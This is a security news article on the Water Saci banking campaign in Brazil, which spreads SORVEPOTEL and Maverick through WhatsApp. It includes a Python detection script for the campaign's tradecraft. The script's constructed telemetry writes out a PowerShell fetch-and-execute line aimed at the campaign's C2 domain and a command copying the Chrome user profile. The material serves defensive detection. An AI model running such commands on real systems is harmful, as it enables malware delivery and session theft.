WhatsApp Banking Worm: How SORVEPOTEL and Maverick Turn Browsers into a Botnet in Brazil

12.11.2025 4 minutes Author: Newsman

Brazil is facing a new wave of banking attacks: the malware duo SORVEPOTEL and Maverick hijacks WhatsApp Web sessions, blasts an infected ZIP file to all contacts, and then uses the victim’s browser to drain accounts at the country’s biggest banks. Researchers believe the Water Saci campaign is part of the same criminal ecosystem that previously developed the Coyote banking trojan.

The Maverick malware and its companion component SORVEPOTEL target Windows users in Brazil and their online banking sessions. Infection starts with a phishing message on WhatsApp: the victim receives a ZIP archive that contains a Windows shortcut (LNK) file. When opened, the shortcut launches cmd.exe or PowerShell, which reaches out to a remote server (including the domain zapgrande[.]com) to download the first-stage payload and execute a script.

  • This PowerShell chain disables Microsoft Defender and UAC, then pulls down a .NET loader equipped with anti-analysis tricks. The loader checks for debuggers and reverse-engineering tools and exits if any are found. Once the coast is clear, it downloads the main modules of the attack — SORVEPOTEL and the Maverick banking trojan. Before activating, Maverick verifies the victim is actually located in Brazil by checking the system’s time zone, language, region, and date/time format.

  • From there, the malware monitors active browser tabs and compares URLs against a hard-coded list of banks and financial services in Latin America. When it sees a match, it contacts its command-and-control (C2) infrastructure to fetch instructions. Maverick can then overlay phishing pages on top of real banking sites, harvest credentials, capture screenshots, list running processes and files, execute arbitrary CMD or PowerShell commands, and generally take full remote control of the machine (download, upload, delete, rename, move files, reboot or shut down the system, and update itself).

  • Water Saci’s signature move is aggressive self-propagation through WhatsApp Web. The scripts download ChromeDriver and Selenium, copy the victim’s real Chrome profile — cookies, auth tokens, and session data included — into a temporary workspace, and use it to log into WhatsApp Web without QR-code scanning. SORVEPOTEL then automatically sends the same malicious ZIP file to every harvested contact, while displaying a fake “WhatsApp Automation v6.0” banner to disguise the mass-messaging behavior.

Another notable quirk is its non-standard C2 setup. Instead of classic HTTP callbacks, part of the command channel works over IMAP access to terra.com[.]br mailboxes using hard-coded credentials. The backdoor checks the attacker-controlled inbox for new messages that contain C2 URLs and tasking. Some of these accounts are protected with MFA, which slows operations but also makes the infrastructure harder to take down. Vendors note that Water Saci effectively runs a remote operations center: operators can pause/resume the campaign, monitor the spread in real time, and leverage infected hosts as a coordinated botnet.
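The infection chain in the list above (an LNK opened from a WhatsApp ZIP spawning a script host that downloads from the quoted C2 domain, the Chrome profile copy and ChromeDriver launch used for propagation) and the IMAP command channel described in this paragraph each leave distinctive traces in endpoint telemetry. The following detection pass is an added example, not code from the article or from any of the vendors it cites: it runs a handful of rules over constructed Sysmon-style process-creation and network-connection events. The only indicators taken from the article are the domains zapgrande.com and terra.com.br; the event records, the allow-list of mail clients, and every path and PID are constructed placeholders.

```python
"""Detection pass over constructed Sysmon-style events for the Water Saci
tradecraft described in the article: LNK -> script host -> download, Chrome
profile copy / chromedriver launch, and an IMAP command channel."""
import re
from dataclasses import dataclass
from ntpath import basename  # splits Windows paths correctly on any host

# Domains quoted in the article; everything else in this file is constructed.
KNOWN_C2_DOMAINS = {"zapgrande.com"}
KNOWN_MAIL_C2_DOMAINS = {"terra.com.br"}

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}  # assumed allow-list of legitimate IMAP users
IMAP_PORTS = {143, 993}

DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|bitsadmin|\bcurl\b", re.I)
CHROME_PROFILE = re.compile(r"google\\chrome\\user data", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def _host_in(domains: set[str], hostname: str) -> bool:
    """True if hostname equals one of the domains or is a subdomain of it."""
    h = hostname.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in domains)


def _cmdline_hits_known_c2(cmdline: str) -> bool:
    hosts = re.findall(r"https?://([A-Za-z0-9.\-]+)", cmdline)
    return any(_host_in(KNOWN_C2_DOMAINS, h) for h in hosts)


def check_process(ev: dict) -> list[Finding]:
    """Rules for a process-creation event (Sysmon-style EventID 1)."""
    image = basename(ev["image"]).lower()
    parent = basename(ev.get("parent", "")).lower()
    cmd = ev.get("cmdline", "")
    out = []
    # Stage 1: an LNK double-clicked in Explorer spawns a script host that fetches a payload.
    if image in SCRIPT_HOSTS and parent == "explorer.exe" and (
        DOWNLOAD_CRADLE.search(cmd) or _cmdline_hits_known_c2(cmd)
    ):
        out.append(Finding("lnk_script_download", ev["pid"], cmd))
    # Propagation prep: a script host touches the Chrome profile directory (profile copy).
    if image in SCRIPT_HOSTS and CHROME_PROFILE.search(cmd):
        out.append(Finding("chrome_profile_copy", ev["pid"], cmd))
    # Propagation: chromedriver started by a script host rather than by a test harness.
    if image == "chromedriver.exe" and parent in SCRIPT_HOSTS:
        out.append(Finding("chromedriver_from_script", ev["pid"], f"parent={parent}"))
    return out


def check_network(ev: dict) -> list[Finding]:
    """Rules for a network-connection event (Sysmon-style EventID 3)."""
    image = basename(ev["image"]).lower()
    host, port = ev.get("dst_host", ""), ev.get("dst_port")
    out = []
    # IMAP from anything that is not a mail client is suspicious; the quoted
    # provider domain upgrades it to a high-confidence match.
    if port in IMAP_PORTS and image not in MAIL_CLIENTS:
        rule = ("imap_c2_known_provider" if _host_in(KNOWN_MAIL_C2_DOMAINS, host)
                else "imap_from_non_mail_client")
        out.append(Finding(rule, ev["pid"], f"{image} -> {host}:{port}"))
    return out


def scan(events: list[dict]) -> list[Finding]:
    findings = []
    for ev in events:
        if ev["event"] == 1:
            findings.extend(check_process(ev))
        elif ev["event"] == 3:
            findings.extend(check_network(ev))
    return findings


def rule_counts(findings: list[Finding]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry: two benign events interleaved with the chain from the article.
CONSTRUCTED_EVENTS = [
    {"event": 1, "pid": 101, "image": r"C:\Program Files\Reader\reader.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "reader.exe invoice.pdf"},
    {"event": 1, "pid": 102, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://zapgrande.com/stage1-placeholder | iex"'},
    {"event": 1, "pid": 103, "image": r"C:\Windows\System32\cmd.exe", "parent": PS,
     "cmdline": r'cmd /c xcopy "%LOCALAPPDATA%\Google\Chrome\User Data\Default" C:\Temp\p /E /H'},
    {"event": 1, "pid": 104, "image": r"C:\Temp\chromedriver.exe", "parent": PS,
     "cmdline": "chromedriver.exe --port=9515"},
    {"event": 3, "pid": 105, "image": r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe",
     "dst_host": "imap.example.net", "dst_port": 993},
    {"event": 3, "pid": 102, "image": PS, "dst_host": "imap.terra.com.br", "dst_port": 993},
]

if __name__ == "__main__":
    for f in scan(CONSTRUCTED_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

Each rule maps to one behaviour the article attributes to the campaign, so a single host producing hits from more than one rule (a download cradle from Explorer, then a Chrome profile copy, then IMAP traffic from the same script host) is far stronger evidence than any one rule alone. The IMAP rule deliberately fires on any non-allow-listed process, not only on the quoted provider, because the mailbox provider is the easiest part of this setup for the operators to change.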

The Coyote banking trojan predates Maverick: it was written in .NET, focused on Brazilian users and banks, and specialized in intercepting browser sessions. Later analysis by several vendors (including Trend Micro, Kaspersky and CyberProof) found major code overlaps between Maverick and Coyote, similar targeting, and the same reliance on WhatsApp as a primary delivery vector; together these are strong signals that the two belong to one Brazilian cybercriminal ecosystem. At the same time, researchers stress that Maverick should be treated as a distinct evolution: instead of relying on traditional droppers, it pivots to stealing real browser profiles and abusing mainstream messaging platforms for stealthy, large-scale propagation.

The Water Saci campaign shows that modern banking trojans look more like full-blown offensive platforms than simple keyloggers. Threat actors are moving away from obvious EXE payloads toward VBS/PowerShell scripts that steal browser profiles, bypass normal login flows in messaging apps, and build distributed botnets on top of everyday consumer services. In regions where WhatsApp is the default communication channel, this means that any ZIP archive from a trusted contact can be the entry point to a major financial compromise.
